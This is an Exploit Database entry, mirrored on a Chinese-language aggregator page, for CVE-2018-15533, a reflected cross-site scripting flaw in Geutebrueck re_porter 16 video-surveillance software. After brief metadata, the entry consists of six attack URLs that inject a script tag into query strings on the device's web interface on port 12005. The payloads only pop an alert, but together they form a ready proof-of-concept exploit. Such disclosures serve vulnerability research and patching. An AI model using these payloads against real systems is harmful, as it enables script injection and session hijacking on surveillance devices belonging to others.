Geutebrueck re_porter 16 – Cross-Site Scripting

• Exploit Database
• 17 阅读

• 作者： Kamil Suska
  日期： 2018-08-22
• 类别：

  • webapps
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/45242/

• # Exploit Title: Geutebrueck re_porter 16 - Cross-Site Scripting
  # Date: 2018-08-03
  # Exploit Author: Kamil Suska
  # Vendor: https://www.geutebrueck.com/en_US.html
  # Link: https://www.sourcesecurity.com/geutebruck-re-porter-16-technical-details.html
  # Version: prior 7.8.974.20
  # CVE-2018-15533
  
  # Attack Vectors
  http://example.com:12005/modifychannel/exec?vv9r7<script>alert(1)</script>auubw=1
  
  http://example.com:12005/images/IOMemoryPool.png?ebmf6<script>alert(1)</script>pmsih=1
  
  http://example.com:12005/images/Statistics.png?q3dlx<script>alert(1)</script>zjvdw=1
  
  http://example.com:12005/images/GLIBBackground.jpg?itfvf<script>alert(1)</script>irvnl=1
  
  http://example.com:12005/images/MainMemoryPool.png?bzu69<script>alert(1)</script>m2hhj=1
  
  http://example.com:12005/images/ProcessMemory.png?f4d7j<script>alert(1)</script>m5by3=